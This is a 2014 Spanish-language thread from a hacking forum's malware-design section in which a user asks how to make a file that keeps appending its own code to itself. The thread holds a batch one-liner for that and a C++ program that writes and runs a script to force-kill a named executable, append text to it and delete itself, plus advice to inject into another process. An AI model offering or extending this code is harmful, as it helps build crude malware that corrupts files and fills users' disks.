elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Malware que se autocopia sobre sí mismo - Pregunta [C++]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Malware que se autocopia sobre sí mismo - Pregunta [C++]  (Leído 4,557 veces)
zikotik

Desconectado Desconectado

Mensajes: 59



Ver Perfil
Malware que se autocopia sobre sí mismo - Pregunta [C++]
« en: 18 Febrero 2014, 17:58 pm »

Hola qué tal, estaba aburro y decidí hacer algo así como un malware, virus, o como lo quieran llamar, que lo que hace es autocopiar su mismo código al final del mismo, de tal manera que se vaya duplicando su tamaño cada vez más y más.

El problema es que se me ocurrió hacerlo en batch ya que quería hacer un concepto base, y la verdad es que no tengo ni idea de cómo pasarlo a lenguage C++ (se programar en este).

No sé si pueden tirarme una idea aunque sea para ver cómo me las puedo arreglar.

Código
  1. @echo off
  2. type archivo.bat >> archivo.bat

Básicamente lee su mismo código y se autocopia al final del mismo archivo, y como no reconoce fin de línea, se sigue copiando, pero en C++ tiraría error ya que no se puede modificar el mismo archivo si está en ejecución, por éso pregunto para saber si se les ocurre algo.

Gracias de antemano.
En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Malware que se autocopia sobre sí mismo - Pregunta [C++]
« Respuesta #1 en: 18 Febrero 2014, 18:01 pm »

Hola qué tal, estaba aburro y decidí hacer algo así como un malware, virus, o como lo quieran llamar, que lo que hace es autocopiar su mismo código al final del mismo, de tal manera que se vaya duplicando su tamaño cada vez más y más.

El problema es que se me ocurrió hacerlo en batch ya que quería hacer un concepto base, y la verdad es que no tengo ni idea de cómo pasarlo a lenguage C++ (se programar en este).

No sé si pueden tirarme una idea aunque sea para ver cómo me las puedo arreglar.

Código
  1. @echo off
  2. type archivo.bat >> archivo.bat

Básicamente lee su mismo código y se autocopia al final del mismo archivo, y como no reconoce fin de línea, se sigue copiando, pero en C++ tiraría error ya que no se puede modificar el mismo archivo si está en ejecución, por éso pregunto para saber si se les ocurre algo.

Gracias de antemano.

Injectar en algún proceso, terminar el proceso del archivo a modificar, desde el código remoto modificar el archivo.
En línea

zikotik

Desconectado Desconectado

Mensajes: 59



Ver Perfil
Re: Malware que se autocopia sobre sí mismo - Pregunta [C++]
« Respuesta #2 en: 18 Febrero 2014, 21:26 pm »

No encontré cómo inyectar el proceso en otro, así que hice algo mucho más fácil...

Escribir un batch desde el ejecutable, ejecutar este batch y listo, pero para no dar mucho lío de código, dejo este mismo pero acortado.

NOTA: YA SÉ QUE LO SIGUIENTE NO SE DEBE HACER Y QUE MUCHOS ME VAN A RETAR SEGURAMENTE O ME DIRAN PEDAZO DE HIJO DE..., PERO LO HICE PORQUE NO ME DIO MUCHO LA CABEZA...

Código
  1. #include <iostream>
  2. #include <fstream>
  3. #include <stdlib.h>
  4.  
  5. using namespace std;
  6.  
  7. int main(){
  8. fstream file("tmp.bat", ios::out);
  9. file << "taskkill /F /IM arch.exe\necho PROBANDO 123>>arch.exe\ndel %0\nexit";
  10. file.close();
  11.  
  12. ifstream tmp("tmp.bat");
  13. while(!tmp){
  14. ifstream tmp("tmp.bat");
  15. }
  16. tmp.close();
  17.  
  18. system("tmp.bat");
  19. }
En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Malware que se autocopia sobre sí mismo - Pregunta [C++]
« Respuesta #3 en: 18 Febrero 2014, 21:50 pm »

Pues si lo vas a hacer desde un bat recomiendo dejar unos segundos de retraso antes de ejecutar el resto.
En línea

zikotik

Desconectado Desconectado

Mensajes: 59



Ver Perfil
Re: Malware que se autocopia sobre sí mismo - Pregunta [C++]
« Respuesta #4 en: 19 Febrero 2014, 14:54 pm »

Para el retraso de ejecución, directamente utilicé el While para que intente abir batch en modo input para saber si ya existe o aún no, en cuyo caso de existir, cierra la lectura y ejecuta el batch.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Autocopia
Programación Visual Basic
hentei 1 1,381 Último mensaje 14 Julio 2005, 01:24 am
por Cicklow
Separar Voz y otra pregunta aki mismo?
Multimedia
alexkof158 2 2,207 Último mensaje 10 Junio 2008, 18:46 pm
por alexkof158
Yahoo Japón descubre malware en sus servidores el mismo día que Goo es ....
Noticias
wolfbcn 0 1,463 Último mensaje 4 Abril 2013, 18:54 pm
por wolfbcn
Pregunta sobre la estructura de un malware
Análisis y Diseño de Malware
dega1980 6 3,534 Último mensaje 13 Marzo 2014, 16:07 pm
por dega1980
El mismo servicio antimalware de McAfee estaba enviando un enlace con malware...
Noticias
wolfbcn 0 1,481 Último mensaje 17 Noviembre 2017, 01:44 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines